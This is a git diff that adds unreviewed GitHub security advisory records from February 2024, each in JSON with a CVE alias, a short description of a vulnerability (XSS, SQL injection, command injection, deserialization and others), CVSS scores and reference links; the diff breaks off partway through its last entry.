a/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json b/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json new file mode 100644 index 0000000000000..375fc82101889 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-553x-x9jq-656c", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-45227" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAn attacker with access to the web application with vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"dns.0.server\" parameter.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45227" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json b/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json new file mode 100644 index 0000000000000..c1888239c6e67 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55g3-3qvv-89r4", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-22464" + ], + "details": "\nDell EMC AppSync, versions from 4.2.0.0 to 4.6.0.0 including all Service Pack releases, contain an exposure of sensitive information vulnerability in AppSync server logs. A high privileged remote attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable system with privileges of the compromised account.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22464" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T10:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json b/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json new file mode 100644 index 0000000000000..b29238b276e6e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55rf-79cf-hxgm", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1197" + ], + "details": "A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1197" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252695" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252695" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json b/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json new file mode 100644 index 0000000000000..6a33ac31f70d3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56w6-jjc5-f5mr", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24858" + ], + "details": "A race condition was found in the Linux kernel's net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24858" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8154" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json b/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json new file mode 100644 index 0000000000000..d57cd9e6b3ecc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57qm-6jgh-x438", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-49617" + ], + "details": "\n\n\n\n\nThe MachineSense application programmable interface (API) is improperly protected and can be accessed without authentication. A remote attacker could retrieve and modify sensitive information without any authentication.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49617" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json b/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json new file mode 100644 index 0000000000000..f852545a10106 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-59h7-67hj-6ppf", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2024-24482" + ], + "details": "Aprktool before 2.9.3 on Windows allows ../ and /.. directory traversal.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-vgwr-4w3p-xmjv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24482" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T05:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json b/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json new file mode 100644 index 0000000000000..f301b2c500a7a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5cmr-7rv7-358p", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0372" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0372" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json b/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json new file mode 100644 index 0000000000000..c912c3596bcd0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fr5-frrw-m97p", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24943" + ], + "details": "In JetBrains Toolbox App before 2.2 a DoS attack was possible via a malicious SVG image", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24943" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json b/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json new file mode 100644 index 0000000000000..e7b6e966ae6e5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g8q-6f25-m4g2", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41283" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41283" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-53" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json b/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json new file mode 100644 index 0000000000000..fd1aa22df95c0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gvr-285q-pwc3", + "modified": "2024-02-04T15:30:22Z", + "published": "2024-02-04T15:30:22Z", + "aliases": [ + "CVE-2023-6240" + ], + "details": "A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6240" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6240" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250843" + }, + { + "type": "WEB", + "url": "https://people.redhat.com/~hkario/marvin/" + }, + { + "type": "WEB", + "url": "https://securitypitfalls.wordpress.com/2023/10/16/experiment-with-side-channel-attacks-yourself/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-402" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T14:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json b/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json new file mode 100644 index 0000000000000..22b88199edd7f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h74-7w4c-g92x", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-22836" + ], + "details": "An OS command injection vulnerability exists in Akaunting v3.1.3 and earlier. An attacker can manipulate the company locale when installing an app to execute system commands on the hosting server.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22836" + }, + { + "type": "WEB", + "url": "https://akaunting.com/" + }, + { + "type": "WEB", + "url": "https://github.com/akaunting/akaunting/releases/tag/3.1.4" + }, + { + "type": "WEB", + "url": "https://github.com/u32i/cve/tree/main/CVE-2024-22836" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json b/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json new file mode 100644 index 0000000000000..4e31b7fa6a517 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hg2-mhp5-c2q8", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-31004" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. IBM X-Force ID: 254765.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31004" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254765" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-300" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json b/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json new file mode 100644 index 0000000000000..45dca959ef70d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5j36-2f99-3384", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2023-48645" + ], + "details": "An issue was discovered in the Archibus app 4.0.3 for iOS. It uses a local database that is synchronized with a Web central server instance every time the application is opened, or when the refresh button is used. There is a SQL injection in the search work request feature in the Maintenance module of the app. This allows performing queries on the local database.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48645" + }, + { + "type": "WEB", + "url": "https://excellium-services.com/cert-xlm-advisory/CVE-2023-48645" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T09:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json b/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json new file mode 100644 index 0000000000000..ccd7839ead607 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jxw-j59v-xhxg", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-21399" + ], + "details": "Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21399" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21399" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json b/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json new file mode 100644 index 0000000000000..aee9d0aeb06d8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mg2-7ppf-36vc", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24017" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /common/dict/list", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24017" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24017.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json b/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json new file mode 100644 index 0000000000000..fd58d7774247f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mh8-m4xv-8wfr", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20011" + ], + "details": "In alac decoder, there is a possible information disclosure due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441146; Issue ID: ALPS08441146.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20011" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json b/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json new file mode 100644 index 0000000000000..388c5d67cad42 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5p29-m8h2-83cg", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24495" + ], + "details": "SQL Injection vulnerability in delete-tracker.php in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via crafted GET request.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24495" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/DailyHabitTracker-SQL_Injection.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json b/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json new file mode 100644 index 0000000000000..53d86b34db97b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5ppc-gr6c-jgcj", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22900" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the setNetworkCardInfo function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22900" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/29" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json b/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json new file mode 100644 index 0000000000000..dae478202bf0b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pq5-cp3w-7chj", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22320" + ], + "details": "IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22320" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279146" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7112382" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json b/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json new file mode 100644 index 0000000000000..faecc16f8b954 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q8j-7rff-2fw6", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0428" + ], + "details": "The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0428" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json b/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json new file mode 100644 index 0000000000000..934b2ccc3efd4 --- /dev/null +++ 